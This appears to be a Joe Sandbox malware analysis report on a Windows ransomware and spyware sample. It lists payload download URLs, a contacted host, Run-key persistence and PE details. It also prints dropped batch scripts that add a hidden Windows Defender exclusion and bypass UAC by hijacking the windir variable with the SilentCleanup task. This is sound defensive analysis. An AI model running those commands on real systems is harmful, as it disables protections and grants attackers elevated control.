                    https://qcisaa.sn.files.1drv.com/y4myaa9OvyECoBdBcRm0EdYi3SYgM-H9eDickjezG2FcBm2P6AhF8ifoGyKxGwKMCHJ | Srakjle.exe, 00000018.00000003.344865227.00000000008D1000.00000004.00000001.sdmp | false | - | high
                    https://qcisaa.sn.files.1drv.com/y4mJP3DWIE85gNIpmObLH3hi3UpJBBLdFJk7RCXT24FMEV8lArD0Fn2UIcXDbPv6JQH | Srakjle.exe, 00000017.00000003.331649206.0000000000919000.00000004.00000001.sdmp, Srakjle.exe, 00000017.00000003.327780846.0000000000918000.00000004.00000001.sdmp | false | - | high
                    https://qcisaa.sn.files.1drv.com/y4mh8HSTx1Gc1J_Se9cvXUaWcrzZtNRVGZZTLbaxsKszTpDWJ-FC3XLmVZQpssvfNP6 | Srakjle.exe, 00000017.00000003.331649206.0000000000919000.00000004.00000001.sdmp | false | - | high
                    https://qcisaa.sn.files.1drv.com/y4mPMXRQ9RhgDP1jnSDjqdPjwRNYCC8VbCCQIIz4UaVns5irDBNa_yn-ZyicxZlvW-L | Srakjle.exe, 00000017.00000003.327666701.0000000000908000.00000004.00000001.sdmp, Srakjle.exe, 00000018.00000003.357618476.00000000008DB000.00000004.00000001.sdmp | false | - | high
                    https://onedrive.live.com/download?cid=D6676A9A61E841F3&resid=D6676A9A61E841F3%21155&authkey=AG_5U-e | Srakjle.exe, 00000018.00000003.344865227.00000000008D1000.00000004.00000001.sdmp | false | - | high

                                  Contacted IPs


                                  Public

                                   IP | Domain | Country | ASN | ASN Name | Malicious
                                   31.3.152.100 | twistednerd.dvrlists.com | Sweden | 51430 | ALTUSNL | false

                                  Private

                                  IP
                                  192.168.2.1

                                  General Information

                                  Joe Sandbox Version:33.0.0 White Diamond
                                  Analysis ID:487629
                                  Start date:21.09.2021
                                  Start time:22:13:55
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 13m 24s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Sample file name:yVhvGnsUpL (renamed file extension from none to exe)
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                   Number of new started processes analysed:37
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal100.rans.troj.spyw.evad.winEXE@23/10@75/2
                                  EGA Information:Failed
                                  HDC Information:
                                  • Successful, ratio: 5.5% (good quality ratio 5.2%)
                                  • Quality average: 78.3%
                                  • Quality standard deviation: 27.4%
                                  HCA Information:
                                  • Successful, ratio: 99%
                                  • Number of executed functions: 33
                                  • Number of non-executed functions: 230
                                  Cookbook Comments:
                                  • Adjust boot time
                                  • Enable AMSI
                                  Warnings:
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                  • Excluded IPs from analysis (whitelisted): 13.107.42.13, 13.107.42.12, 23.35.236.56, 20.50.102.62, 13.107.43.13, 173.222.108.210, 173.222.108.226, 20.54.110.249, 40.112.88.60, 80.67.82.235, 80.67.82.211
                                  • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, l-0004.dc-msedge.net, l-0004.l-msedge.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, l-0003.l-msedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, sn-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, fs.microsoft.com, odc-web-geo.onedrive.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.useroor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, odc-sn-files-geo.onedrive.akadns.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, odc-sn-files-brs.onedrive.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                   • Not all processes were analyzed; the report is missing behavior information
                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                  Simulations

                                  Behavior and APIs

                                   Time | Type | Description
                                   22:14:57 | API Interceptor | 2x Sleep call for process: yVhvGnsUpL.exe modified
                                   22:15:19 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Srakjle C:\Users\Public\Libraries\eljkarS.url
                                   22:15:27 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Srakjle C:\Users\Public\Libraries\eljkarS.url
                                   22:15:28 | API Interceptor | 2x Sleep call for process: Srakjle.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  No context

                                  Domains

                                  No context

                                  ASN

                                  No context

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\Users\Public\KDECO.bat
                                  Process:C:\Users\user\Desktop\yVhvGnsUpL.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):155
                                  Entropy (8bit):4.687076340713226
                                  Encrypted:false
                                  SSDEEP:3:LjT5LJJFIf9oM3KN6QNb3DM9bWQqA5SkrF2VCceGAFddGeWLCXlRA3+OR:rz81R3KnMMQ75ieGgdEYlRA/R
                                  MD5:213C60ADF1C9EF88DC3C9B2D579959D2
                                  SHA1:E4D2AD7B22B1A8B5B1F7A702B303C7364B0EE021
                                  SHA-256:37C59C8398279916CFCE45F8C5E3431058248F5E3BEF4D9F5C0F44A7D564F82E
                                  SHA-512:FE897D9CAA306B0E761B2FD61BB5DC32A53BFAAD1CE767C6860AF4E3AD59C8F3257228A6E1072DAB0F990CB51C59C648084BA419AC6BC5C0A99BDFFA569217B7
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: start /min powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" & exit
                                  C:\Users\Public\Libraries\Srakjle\Srakjle.exe
                                  Process:C:\Users\user\Desktop\yVhvGnsUpL.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):1133568
                                  Entropy (8bit):6.333495513346421
                                  Encrypted:false
                                  SSDEEP:12288:lIspEfnP8N/seflQTshT8aqeTW39KqyeoAdrL7SUbDz5Zp:320N/seflZhTmiW3AirPzz5Z
                                  MD5:CF98D2D4D4555323842C8371DB09347E
                                  SHA1:2BD28F09D3EA7C08BAE3A90DD32C28335488EB43
                                  SHA-256:8FA72E87ADDEAD9671E573D7CB843CA784A10CFBF6ACF5B6BC4830DF66FE0BF0
                                  SHA-512:972271FF4B87A3EE8217FD0F13EA9D0464124A117E96B09B6B96F49A7B21CF1076115F6E7BDA753866BDE4CFE9170A0EA7F9EAD75DDA695B3B29150FD29E4849
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 13%
                                  Reputation:unknown
                                  Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................l.............@..............................................@..............................f*.......&...................0...v........................... .......................................................text.............................. ..`.itext.............................. ..`.data...............................@....bss....,9...............................idata..f*.......,..................@....tls....4................................rdata....... ......................@..@.reloc...v...0...x..................@..B.rsrc....&.......&...&..............@..@.....................L..............@..@................................................................................................
                                  C:\Users\Public\Libraries\eljkarS.url
                                  Process:C:\Users\user\Desktop\yVhvGnsUpL.exe
                                  File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Srakjle\\Srakjle.exe">), ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):96
                                  Entropy (8bit):4.77898063752017
                                  Encrypted:false
                                  SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMR52XHvsGKd6ov:HRYFVmTWDyzqwHvsbDv
                                  MD5:F7FE80CDDDABC41175A9174062BF9FB4
                                  SHA1:EA61F6248EAEF211BD5F08091C691E468161C847
                                  SHA-256:6B3C535B354D7C67C9A4840F8ACCD2AA9B2DFF80FF3C90BE66D944AA8A8E6F81
                                  SHA-512:A49CF21FD89CDFB5716BE3BBD38E91073804FB3B66D9F5AC34D0C3E86E2C4563D027986C4A2A2FE33991A2A652FE4DD3578411234B29FB81826079370C7FD926
                                  Malicious:false
                                  Yara Hits:
                                  • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\eljkarS.url, Author: @itsreallynick (Nick Carr)
                                  Reputation:unknown
                                  Preview: [InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Srakjle\\Srakjle.exe"..IconIndex=2..
                                  C:\Users\Public\Trast.bat
                                  Process:C:\Users\user\Desktop\yVhvGnsUpL.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):34
                                  Entropy (8bit):4.314972767530033
                                  Encrypted:false
                                  SSDEEP:3:LjTnaHF5wlM:rnaHSM
                                  MD5:4068C9F69FCD8A171C67F81D4A952A54
                                  SHA1:4D2536A8C28CDCC17465E20D6693FB9E8E713B36
                                  SHA-256:24222300C78180B50ED1F8361BA63CB27316EC994C1C9079708A51B4A1A9D810
                                  SHA-512:A64F9319ACC51FFFD0491C74DCD9C9084C2783B82F95727E4BFE387A8528C6DCF68F11418E88F1E133D115DAF907549C86DD7AD866B2A7938ADD5225FBB2811D
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: start /min C:\Users\Public\UKO.bat
                                  C:\Users\Public\UKO.bat
                                  Process:C:\Users\user\Desktop\yVhvGnsUpL.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):250
                                  Entropy (8bit):4.865356627324657
                                  Encrypted:false
                                  SSDEEP:6:rgnMXd1CQnMXd1COm8hnaHNHIXUnMXd1CoD9c1uOw1H1gOvOBAn:rgamIHIXUaXe1uOeVqy
                                  MD5:EAF8D967454C3BBDDBF2E05A421411F8
                                  SHA1:6170880409B24DE75C2DC3D56A506FBFF7F6622C
                                  SHA-256:F35F2658455A2E40F151549A7D6465A836C33FA9109E67623916F889849EAC56
                                  SHA-512:FE5BE5C673E99F70C93019D01ABB0A29DD2ECF25B2D895190FF551F020C28E7D8F99F65007F440F0F76C5BCAC343B2A179A94D190C938EA3B9E1197890A412E9
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: reg delete hkcu\Environment /v windir /f..reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "..schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I & exit..
                                  C:\Users\Public\nest
                                  Process:C:\Users\user\Desktop\yVhvGnsUpL.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):9
                                  Entropy (8bit):3.169925001442312
                                  Encrypted:false
                                  SSDEEP:3:cvn:cv
                                  MD5:64120803774747F6A0E65FBF68864DB9
                                  SHA1:2D19E04E427F41A57A40C45C8E15D7BD7FEFF91F
                                  SHA-256:4BC0305150E635DF5014B49EFB911171F08137F187564E8EC69148525100498F
                                  SHA-512:C57320C1EA459F360BDFAECB4F23882B7850A93F894B14C4356FE88B64FE397FF27CA2E9E52EA30484DEEF088AAB8970B98C8E73BB92C397552AA6A02BDAFC64
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: Srakjle..
                                  C:\Users\Public\nest.bat
                                  Process:C:\Users\user\Desktop\yVhvGnsUpL.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):53
                                  Entropy (8bit):4.263285494083192
                                  Encrypted:false
                                  SSDEEP:3:LjT9fnMXdemzCK0vn:rZnMXd1CV
                                  MD5:8ADA51400B7915DE2124BAAF75E3414C
                                  SHA1:1A7B9DB12184AB7FD7FCE1C383F9670A00ADB081
                                  SHA-256:45AA3957C29865260A78F03EEF18AE9AEBDBF7BEA751ECC88BE4A799F2BB46C7
                                  SHA-512:9AFC138157A4565294CA49942579CDB6F5D8084E56F9354738DE62B585F4C0FA3E7F2CBC9541827F2084E3FF36C46EED29B46F5DD2444062FFCD05C599992E68
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: start /min reg delete hkcu\Environment /v windir /f..
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\Srakjlekngtcyxfikcsesbckosunxns[1]
                                  Process:C:\Users\user\Desktop\yVhvGnsUpL.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):844800
                                  Entropy (8bit):7.998270300086775
                                  Encrypted:true
                                  SSDEEP:24576:V0SUUlISC/pYz/bZ5ut74t8Ld/xUjdqJZ:VwUK7cEestxUj0H
                                  MD5:35CD77E767A6005B26709CE820FB50A6
                                  SHA1:3322111384C098DFDE8B8CDDF60CA078C642CB35
                                  SHA-256:4CA74BAB815601FB1A29D46116F084663A9722A403431CE59B9305DF3A86E785
                                  SHA-512:3A331821D2945E7A49BED2F9638738172FFC2758028DFEF58AAAF4D1DB960B42422A21A308859985CAB993FB4754E162A586CC18BFC09AEBD71290F30E8A2431
                                  Malicious:false
                                  Reputation:unknown
                                   Preview: (encrypted binary data; preview omitted)
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\Srakjlekngtcyxfikcsesbckosunxns[2]
                                  Process:C:\Users\Public\Libraries\Srakjle\Srakjle.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):844800
                                  Entropy (8bit):7.998270300086775
                                  Encrypted:true
                                  SSDEEP:24576:V0SUUlISC/pYz/bZ5ut74t8Ld/xUjdqJZ:VwUK7cEestxUj0H
                                  MD5:35CD77E767A6005B26709CE820FB50A6
                                  SHA1:3322111384C098DFDE8B8CDDF60CA078C642CB35
                                  SHA-256:4CA74BAB815601FB1A29D46116F084663A9722A403431CE59B9305DF3A86E785
                                  SHA-512:3A331821D2945E7A49BED2F9638738172FFC2758028DFEF58AAAF4D1DB960B42422A21A308859985CAB993FB4754E162A586CC18BFC09AEBD71290F30E8A2431
                                  Malicious:false
                                  Reputation:unknown
                                   Preview: (encrypted binary data; preview omitted)
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\Srakjlekngtcyxfikcsesbckosunxns[2]
                                  Process:C:\Users\Public\Libraries\Srakjle\Srakjle.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):844800
                                  Entropy (8bit):7.998270300086775
                                  Encrypted:true
                                  SSDEEP:24576:V0SUUlISC/pYz/bZ5ut74t8Ld/xUjdqJZ:VwUK7cEestxUj0H
                                  MD5:35CD77E767A6005B26709CE820FB50A6
                                  SHA1:3322111384C098DFDE8B8CDDF60CA078C642CB35
                                  SHA-256:4CA74BAB815601FB1A29D46116F084663A9722A403431CE59B9305DF3A86E785
                                  SHA-512:3A331821D2945E7A49BED2F9638738172FFC2758028DFEF58AAAF4D1DB960B42422A21A308859985CAB993FB4754E162A586CC18BFC09AEBD71290F30E8A2431
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: ...].~*.g.a........P..O=.........U.....8..q.F....\..k.e..#....A~c.A\..pA^..Z.zZ....".".."....b&..S...?Y......."...f..[.#<.&./6.|^..Z.zZ....".".."../6...Y...!....0..F...s...K .&.3m....a.F..6..va..S......0.....].k..k.l./e....2...P.../n.[........4............m..G.].4.k.....Y....6.}..:.J....Y.S..,.W.?6.0.. .-e...N..2..%.C:.G>.9.A1...e...l..c....&.].....(.V;`y.Q..I=:.....d.4......z.JBLDR..D"PC.S0.+..._#.x..3."1...2.^.......qsod."&.g.0...I...`...v.....@.k:K.?....;e5..s....y.C...%.....o.|.J../.....[$,.*...._+.?.^...+........_1...K.._&.=.....t..>k.A.........?.PBY'.4ur..V.R.....?..g."6wa.W2..h.....$+...M...R.v.O.....c.R..l..f.'aKq.{{wz.r.{....Z.(..m.c...t.m.@qa..%.5.k.Fz..Y/..|.um...yd.......&._3.:`..=....k........A.DM....A...FT.ye.b......w.;..t..l.$-....h...?...U5...c...v..%.5.k.FS9.R.A....}]...>.Q*.FA.x..)..:r..qi.owwus~..I.6oe.v.....=.f.....DY'.O.FTK9.TG..L.._3..=.}_*.+...M.....@|....[....LM.E..S1&.Q&..Z... ?..1.-...~.6O.J.i...S!.R.q`....

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):6.333495513346421
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.38%
                                  • InstallShield setup (43055/19) 0.43%
                                  • Windows Screen Saver (13104/52) 0.13%
                                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  File name:yVhvGnsUpL.exe
                                  File size:1133568
                                  MD5:cf98d2d4d4555323842c8371db09347e
                                  SHA1:2bd28f09d3ea7c08bae3a90dd32c28335488eb43
                                  SHA256:8fa72e87addead9671e573d7cb843ca784a10cfbf6acf5b6bc4830df66fe0bf0
                                  SHA512:972271ff4b87a3ee8217fd0f13ea9d0464124a117e96b09b6b96f49a7b21cf1076115f6e7bda753866bde4cfe9170a0ea7f9ead75dda695b3b29150fd29e4849
                                  SSDEEP:12288:lIspEfnP8N/seflQTshT8aqeTW39KqyeoAdrL7SUbDz5Zp:320N/seflZhTmiW3AirPzz5Z
                                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                  File Icon

                                  Icon Hash:8dcd2c37ab968be4

                                  Static PE Info

                                  General

                                  Entrypoint:0x46ac6c
                                  Entrypoint Section:.itext
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                                  DLL Characteristics:
                                  Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:bc8cc1eea5c25ce2056d7da92bd98134

                                  Entrypoint Preview

                                  Instruction
                                  push ebp
                                  mov ebp, esp
                                  add esp, FFFFFFF0h
                                  push ebx
                                  mov eax, 00468F74h
                                  call 00007FB8FCBB7D88h
                                  mov ebx, dword ptr [004F9A3Ch]
                                  mov eax, dword ptr [ebx]
                                  call 00007FB8FCC0F2EBh
                                  mov eax, dword ptr [ebx]
                                  mov edx, 0046ACE4h
                                  call 00007FB8FCC0ED77h
                                  mov ecx, dword ptr [004F97C0h]
                                  mov eax, dword ptr [ebx]
                                  mov edx, dword ptr [00466F4Ch]
                                  call 00007FB8FCC0F2E4h
                                  mov ecx, dword ptr [004F988Ch]
                                  mov eax, dword ptr [ebx]
                                  mov edx, dword ptr [00466B90h]
                                  call 00007FB8FCC0F2D1h
                                  mov ecx, dword ptr [004F9898h]
                                  mov eax, dword ptr [ebx]
                                  mov edx, dword ptr [004669C4h]
                                  call 00007FB8FCC0F2BEh
                                  mov eax, dword ptr [ebx]
                                  call 00007FB8FCC0F337h
                                  pop ebx
                                  call 00007FB8FCBB5B19h

                                  Data Directories

                                  Name | Virtual Address | Virtual Size | Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0xfe000 | 0x2a66 | .idata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x10b000 | 0x12600 | .rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x103000 | 0x76f4 | .reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_TLS | 0x102000 | 0x18 | .rdata
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_IAT | 0xfe7d4 | 0x694 | .idata
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                  Sections

                                  Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                  .text | 0x1000 | 0x681dc | 0x68200 | False | 0.523299163415 | data | 6.55816841142 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                  .itext | 0x6a000 | 0xcf0 | 0xe00 | False | 0.557477678571 | data | 5.90308719076 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                  .data | 0x6b000 | 0x8ebe4 | 0x8ec00 | False | 0.272558422723 | data | 4.83463412807 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                  .bss | 0xfa000 | 0x392c | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                  .idata | 0xfe000 | 0x2a66 | 0x2c00 | False | 0.310635653409 | data | 5.15464071518 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                  .tls | 0x101000 | 0x34 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                  .rdata | 0x102000 | 0x18 | 0x200 | False | 0.05078125 | data | 0.205445628135 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .reloc | 0x103000 | 0x76f4 | 0x7800 | False | 0.6095703125 | data | 6.66305090438 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                  .rsrc | 0x10b000 | 0x12600 | 0x12600 | False | 0.401387117347 | data | 5.13864467631 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                  Resources

                                  Name | RVA | Size | Type | Language | Country
                                  RT_CURSOR | 0x10bb4c | 0x134 | data | English | United States
                                  RT_CURSOR | 0x10bc80 | 0x134 | data | English | United States
                                  RT_CURSOR | 0x10bdb4 | 0x134 | data | English | United States
                                  RT_CURSOR | 0x10bee8 | 0x134 | data | English | United States
                                  RT_CURSOR | 0x10c01c | 0x134 | data | English | United States
                                  RT_CURSOR | 0x10c150 | 0x134 | data | English | United States
                                  RT_CURSOR | 0x10c284 | 0x134 | data | English | United States
                                  RT_BITMAP | 0x10c3b8 | 0x1d0 | data | English | United States
                                  RT_BITMAP | 0x10c588 | 0x1e4 | data | English | United States
                                  RT_BITMAP | 0x10c76c | 0x1d0 | data | English | United States
                                  RT_BITMAP | 0x10c93c | 0x1d0 | data | English | United States
                                  RT_BITMAP | 0x10cb0c | 0x1d0 | data | English | United States
                                  RT_BITMAP | 0x10ccdc | 0x1d0 | data | English | United States
                                  RT_BITMAP | 0x10ceac | 0x1d0 | data | English | United States
                                  RT_BITMAP | 0x10d07c | 0x1d0 | data | English | United States
                                  RT_BITMAP | 0x10d24c | 0x1d0 | data | English | United States
                                  RT_BITMAP | 0x10d41c | 0x1d0 | data | English | United States
                                  RT_BITMAP | 0x10d5ec | 0xe8 | GLS_BINARY_LSB_FIRST | English | United States
                                  RT_ICON | 0x10d6d4 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
                                  RT_ICON | 0x10db3c | 0x10a8 | data | English | United States
                                  RT_ICON | 0x10ebe4 | 0x25a8 | data | English | United States
                                  RT_ICON | 0x11118c | 0x94a8 | data | English | United States
                                  RT_DIALOG | 0x11a634 | 0x52 | data | |
                                  RT_DIALOG | 0x11a688 | 0x52 | data | |
                                  RT_STRING | 0x11a6dc | 0x10c | data | |
                                  RT_STRING | 0x11a7e8 | 0x390 | data | |
                                  RT_STRING | 0x11ab78 | 0x188 | data | |
                                  RT_STRING | 0x11ad00 | 0xc8 | data | |
                                  RT_STRING | 0x11adc8 | 0x118 | data | |
                                  RT_STRING | 0x11aee0 | 0x39c | data | |
                                  RT_STRING | 0x11b27c | 0x3a8 | data | |
                                  RT_STRING | 0x11b624 | 0x354 | data | |
                                  RT_STRING | 0x11b978 | 0x3cc | data | |
                                  RT_STRING | 0x11bd44 | 0x214 | data | |
                                  RT_STRING | 0x11bf58 | 0xcc | data | |
                                  RT_STRING | 0x11c024 | 0x194 | data | |
                                  RT_STRING | 0x11c1b8 | 0x3c4 | data | |
                                  RT_STRING | 0x11c57c | 0x338 | data | |
                                  RT_STRING | 0x11c8b4 | 0x294 | data | |
                                  RT_RCDATA | 0x11cb48 | 0x10 | data | |
                                  RT_RCDATA | 0x11cb58 | 0x318 | data | |
                                  RT_RCDATA | 0x11ce70 | 0x697 | Delphi compiled form 'T__3773734381' | |
                                  RT_GROUP_CURSOR | 0x11d508 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                                  RT_GROUP_CURSOR | 0x11d51c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                                  RT_GROUP_CURSOR | 0x11d530 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                                  RT_GROUP_CURSOR | 0x11d544 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                                  RT_GROUP_CURSOR | 0x11d558 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                                  RT_GROUP_CURSOR | 0x11d56c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                                  RT_GROUP_CURSOR | 0x11d580 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                                  RT_GROUP_ICON | 0x11d594 | 0x3e | data | English | United States

                                  Imports

                                  DLL | Import
                                  oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
                                  advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                  user32.dll | GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                  kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, CompareStringA, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                                  kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
